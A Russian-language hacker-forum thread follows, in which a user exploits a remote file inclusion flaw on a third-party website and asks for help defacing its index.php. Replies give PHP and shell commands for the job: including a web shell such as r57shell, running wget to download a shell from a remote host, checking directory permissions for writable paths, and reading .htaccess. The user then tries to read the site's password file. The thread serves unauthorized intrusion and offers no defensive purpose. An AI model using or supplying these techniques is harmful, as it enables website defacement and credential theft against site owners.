Не работает system("echo Hacked > index.php");

Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы

PHP:

system("echo Hacked > index.php");

не работает. Через

PHP:

fopen("index.php", "w")

тоже ессно ничего не выходит
Как можно это обойти?

И вопрос в догонку:
Как мне получить список файлов каталога, который находится на порядок выше?

PHP:

  echo system("cd ../");
  $cmd = "ls";
  echo "command: <b>" . $cmd . "</b><br>";
  echo system($cmd);

не работает...

 

system() может быть запрещено использовать сервером
по поводу fopen() - это уже странно.. ты уверен, что прав хватает? я сомневаюсь...

 

system разрешён. потому как

PHP:

  $cmd = "ls"; 
  echo "command: <b>" . $cmd . "</b><br>"; 
  echo system($cmd);  

выполняется на ура.
А вот то что прав не хватает - скорее оно так и есть. Что можно предпринять в этом случае?

 

проинклудь шел какойнить и посмотри

 

Пытался проинклудить r57shell, но в итоге получаю пустую страницу...

 

Не понял, зачем использовать echo c system(). Результат она и так на экран выводит.
Команда для листинга верхнего каталога -
ls /../

 

Опа, спасибо... а я пытался сделать

PHP:

system("ls ../"); 

буду знать

Но всё же, как задефейсить в данном случае?

 

С помощью качалки стоящей на сервере скачиваешь полноценный шелл - это либо wget, curl и т.д. если не стоит ничего есть команда lwp-mirror, почитай вобще в гуглу
что-то типа - system('wget http://shell.php')

 

PHP:

unlink('index.php');
$data='Hekked';
$fp=fopen('./index.php','wb');
fputs($fp,$data);
fclose($fp);

 

Выполняю комманду system('wget http://site/shell.txt'), а потом system('ls')
Изменений не видно...

 

Я делаю так

PHP:

$data='Hekked';
$fp=fopen('./site.php','wb');
fputs($fp,$data);
fclose($fp);

Вот что получаю...
Warning: fopen(./site.php) [function.fopen]: failed to open stream: Permission denied in http://site/hack on line 3

Warning: fputs(): supplied argument is not a valid stream resource in http://site/hack on line 4

Warning: fclose(): supplied argument is not a valid stream resource in http://site/hack on line 5

 

А откуда ты его wget'ишь? у вгета 2 параметра: куда и откуда

Складируй файлы туда, куда доступ открыт. Смайлы или аватары, или хз что там еще может быть

 

Теперь делаю так

PHP:

system('wget shell.php http://site/shell.txt');

Всё равно ничего не заливается

 

ls -la и посмотри куда доступ есть

 

Везде стоит drwxr-xr-x или -rw-r--r--
Что должно стоять, что бы был доступ?

Добавлено
Вот полный список директории, в которой находится сайт

Code:

total 67 
drwxr-x--- 18 user nobody  1024 Feb  6 2007 . 
drwx--x--x 11 user   user  1024 Aug 11 01:59 .. 
-rw-r--r--  1 user   user   356 May 15 2006 .htaccess 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 CEPF 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 CEU 
-rw-r--r--  1 user   user  3862 Jan 25 2007 CFCintro2new.html 
drwxr-xr-x  3 user   user  1024 Jan 25 2007 CPFC 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 Center 
drwxr-xr-x  2 user   user  1024 May 15 2006 _private 
drwxr-xr-x  4 user   user  1024 May 15 2006 _vti_bin 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 _vti_cnf 
-rw-r--r--  1 user   user  1754 May 15 2006 _vti_inf.html 
drwxr-xr-x  2 user   user  1024 May 15 2006 _vti_log 
drwxr-x---  2 user nobody  1024 May 16 2006 _vti_pvt 
drwxr-xr-x  2 user   user  1024 May 15 2006 _vti_txt 
drwxr-xr-x  2 user   user  1024 May 15 2006 cgi-bin 
-rw-r--r--  1 user   user   518 Jan 30 2007 error_log 
drwxr-xr-x 10 user   user  1024 Jan 25 2007 user 
drwxr-xr-x  3 user   user  1024 Jan 25 2007 images 
-rw-r--r--  1 user   user  4216 Feb  6 2007 index.php 
-rw-r--r--  1 user   user  2700 Jan 25 2007 intro2new.html 
-rw-r--r--  1 user   user  2356 Jan 25 2007 intro3.html 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 legal 
-rw-r--r--  1 user   user 22063 Jan 25 2007 menubar2.html 
-rw-r--r--  1 user   user  2447 May 15 2006 postinfo.html 
-rw-r--r--  1 user   user   312 Jan 25 2007 site_map.txt 
-rw-r--r--  1 user   user  2158 Jan 25 2007 start.html 
drwxr-xr-x  2 user   user  1024 Feb  6 2007 style 
drwxr-xr-x 10 user   user  1024 Jan 30 2007 test 

 

wget,get,curl,lynx,links ?

wget может быть отключен

 

phpinfo() говорит о том что cURL включён.
Как закачать файл через get,curl,lynx,links или где мне об этом можно почитать?

 

http://php.fud.ru/ там curl поищи.
lynx это бровсер

drwx--x--x 11 user user 1024 Aug 11 01:59 ..

Есть там еще .htaccess - должно быть интересно внутри

 

Вот содержимое .htaccess

Code:

# -FrontPage- IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti* order deny,allow deny from all allow from all order deny,allow deny from all AuthName www.site.org AuthUserFile /home/user/public_html/_vti_pvt/service.pwd AuthGroupFile /home/user/public_html/_vti_pvt/service.grp 

 

При попытке прочитать service.pwd получаю

Code:

Warning: readfile() [function.readfile]: open_basedir restriction in effect. File(/home/user/public_html/_vti_pvt/service.pwd) is not within the allowed path(s): (/home/user/:/usr/lib/php:/usr/local/lib/php:/tmp) in http://mysite/shell on line 16

Warning: readfile(/home/user/public_html/_vti_pvt/service.pwd) [function.readfile]: failed to open stream: Operation not permitted in http://mysite/shell on line 16